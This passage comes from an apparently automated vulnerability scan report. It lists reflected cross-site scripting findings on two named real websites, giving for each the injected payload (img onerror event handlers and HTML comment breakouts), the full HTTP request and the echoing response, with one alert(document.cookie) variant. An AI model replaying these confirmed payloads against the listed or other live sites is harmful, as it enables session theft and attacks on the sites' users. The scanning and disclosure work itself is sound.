The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f982c<img%20src%3da%20onerror%3dalert(1)>75affe6a42d was submitted in the REST URL parameter 1. This input was echoed as f982c<img src=a onerror=alert(1)>75affe6a42d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /HomePagef982c<img%20src%3da%20onerror%3dalert(1)>75affe6a42d HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Mon, 10 Jan 2011 18:20:11 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 0909425b1db91ebe3d20340a0cd3ebf6
Content-Length: 3261
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
</a> : HomePagef982c<img src=a onerror=alert(1)>75affe6a42d</h2>
...[SNIP]...

3.21. http://www.ccmaine.net/HomePage [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /HomePage

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47337"><img%20src%3da%20onerror%3dalert(1)>61bf246dcf4 was submitted in the REST URL parameter 1. This input was echoed as 47337"><img src=a onerror=alert(1)>61bf246dcf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /HomePage47337"><img%20src%3da%20onerror%3dalert(1)>61bf246dcf4 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Mon, 10 Jan 2011 18:20:03 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: dc98c484eb8016411a263012303b03fc
Content-Length: 3273
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for HomePage47337"><img src=a onerror=alert(1)>61bf246dcf4 (RSS)" href="http://www.ccmaine.net/HomePage47337">
...[SNIP]...

3.22. http://www.ccmaine.net/ServiceArea [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /ServiceArea

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1d93<img%20src%3da%20onerror%3dalert(1)>1e652f7eb00 was submitted in the REST URL parameter 1. This input was echoed as f1d93<img src=a onerror=alert(1)>1e652f7eb00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ServiceAreaf1d93<img%20src%3da%20onerror%3dalert(1)>1e652f7eb00 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/ServiceOfferings
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:41 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 0f44546dae010234136c69ab529c529c
Content-Length: 3280
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
</a> : ServiceAreaf1d93<img src=a onerror=alert(1)>1e652f7eb00</h2>
...[SNIP]...

3.23. http://www.ccmaine.net/ServiceArea [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /ServiceArea

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a14d"><img%20src%3da%20onerror%3dalert(1)>5bb3ad33910 was submitted in the REST URL parameter 1. This input was echoed as 5a14d"><img src=a onerror=alert(1)>5bb3ad33910 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ServiceArea5a14d"><img%20src%3da%20onerror%3dalert(1)>5bb3ad33910 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/ServiceOfferings
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:00:41 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 01a1cb204eb68f3b229258b88c224a64
Content-Length: 3291
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for ServiceArea5a14d"><img src=a onerror=alert(1)>5bb3ad33910 (RSS)" href="http://www.ccmaine.net/ServiceArea5a14d">
...[SNIP]...

3.24. http://www.ccmaine.net/ServiceOfferings [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /ServiceOfferings

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b9d5"><img%20src%3da%20onerror%3dalert(1)>b1f32d3d153 was submitted in the REST URL parameter 1. This input was echoed as 7b9d5"><img src=a onerror=alert(1)>b1f32d3d153 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ServiceOfferings7b9d5"><img%20src%3da%20onerror%3dalert(1)>b1f32d3d153 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/AboutUs
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:00:53 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: f5be6b6022b0df8893fa7c3238f292fd
Content-Length: 3322
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for ServiceOfferings7b9d5"><img src=a onerror=alert(1)>b1f32d3d153 (RSS)" href="http://www.ccmaine.net/ServiceOfferings7b9d5">
...[SNIP]...

3.25. http://www.ccmaine.net/ServiceOfferings [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /ServiceOfferings

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bd4b3<img%20src%3da%20onerror%3dalert(1)>eeb57d3c8a0 was submitted in the REST URL parameter 1. This input was echoed as bd4b3<img src=a onerror=alert(1)>eeb57d3c8a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ServiceOfferingsbd4b3<img%20src%3da%20onerror%3dalert(1)>eeb57d3c8a0 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/AboutUs
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:00 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: d9dd2b24ab396a9cd51f93f9de07b1c6
Content-Length: 3309
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
</a> : ServiceOfferingsbd4b3<img src=a onerror=alert(1)>eeb57d3c8a0</h2>
...[SNIP]...

3.26. http://www.ccmaine.net/TechnicalSupport [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /TechnicalSupport

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dcb9"><img%20src%3da%20onerror%3dalert(1)>b189af9dcd8 was submitted in the REST URL parameter 1. This input was echoed as 2dcb9"><img src=a onerror=alert(1)>b189af9dcd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /TechnicalSupport2dcb9"><img%20src%3da%20onerror%3dalert(1)>b189af9dcd8 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/ServiceArea
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:12 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: db4dc8c62428cdbb8e1c673cb517b83c
Content-Length: 3322
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for TechnicalSupport2dcb9"><img src=a onerror=alert(1)>b189af9dcd8 (RSS)" href="http://www.ccmaine.net/TechnicalSupport2dcb9">
...[SNIP]...

3.27. http://www.ccmaine.net/TechnicalSupport [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /TechnicalSupport

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 976ce<img%20src%3da%20onerror%3dalert(1)>04d929e646d was submitted in the REST URL parameter 1. This input was echoed as 976ce<img src=a onerror=alert(1)>04d929e646d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /TechnicalSupport976ce<img%20src%3da%20onerror%3dalert(1)>04d929e646d HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/ServiceArea
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:07 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 0feacbd9d3e1a0356e8dce1009bba5c4
Content-Length: 3309
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
</a> : TechnicalSupport976ce<img src=a onerror=alert(1)>04d929e646d</h2>
...[SNIP]...

3.28. http://www.ccmaine.net/a [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /a

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39a81"><img%20src%3da%20onerror%3dalert(1)>a60931266fc was submitted in the REST URL parameter 1. This input was echoed as 39a81"><img src=a onerror=alert(1)>a60931266fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /a39a81"><img%20src%3da%20onerror%3dalert(1)>a60931266fc HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/HomePage47337%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E61bf246dcf4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:00:39 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 1bc6aa6f9451703197fd700f13b535a0
Content-Length: 3231
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for a39a81"><img src=a onerror=alert(1)>a60931266fc (RSS)" href="http://www.ccmaine.net/a39a81">
...[SNIP]...

3.29. http://www.ccmaine.net/a [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5c9b5<img%20src%3da%20onerror%3dalert(1)>90bd250c825 was submitted in the REST URL parameter 1. This input was echoed as 5c9b5<img src=a onerror=alert(1)>90bd250c825 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /a5c9b5<img%20src%3da%20onerror%3dalert(1)>90bd250c825 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/HomePage47337%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E61bf246dcf4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:57 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 25c719ece4c4994f0429bcc010b9f443
Content-Length: 3219
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
</a> : a5c9b5<img src=a onerror=alert(1)>90bd250c825</h2>
...[SNIP]...

3.30. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Allure [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Allure

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 5a5e0--><a%20b%3dc>29f0394fc82 was submitted in the REST URL parameter 5. This input was echoed as 5a5e0--><a b=c>29f0394fc82 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/5a5e0--><a%20b%3dc>29f0394fc82 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:56 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000ZJVVhrC3GuPc1UAALNDHphW:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:47 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "5a5e0--><a b=c>29f0394fc82".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.31. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload c74af--><a%20b%3dc>3f1a901681d was submitted in the REST URL parameter 5. This input was echoed as c74af--><a b=c>3f1a901681d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/c74af--><a%20b%3dc>3f1a901681d HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:09 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000EvQrtGaQnseDQXSXsw3brvD:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:00 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "c74af--><a b=c>3f1a901681d".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.32. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_BonAppetite [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_BonAppetite

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 5aab9--><a%20b%3dc>ec3af74862e was submitted in the REST URL parameter 5. This input was echoed as 5aab9--><a b=c>ec3af74862e in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/5aab9--><a%20b%3dc>ec3af74862e HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:19 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Hd4iE0_k4lcDWx9pjCSs5NG:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:12 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "5aab9--><a b=c>ec3af74862e".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.33. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Brides [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Brides

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload f6bac--><a%20b%3dc>5d7fa6913fa was submitted in the REST URL parameter 5. This input was echoed as f6bac--><a b=c>5d7fa6913fa in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/f6bac--><a%20b%3dc>5d7fa6913fa HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:53 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000uTCXbTRspSqOoVBK9qJuA9H:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:34 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
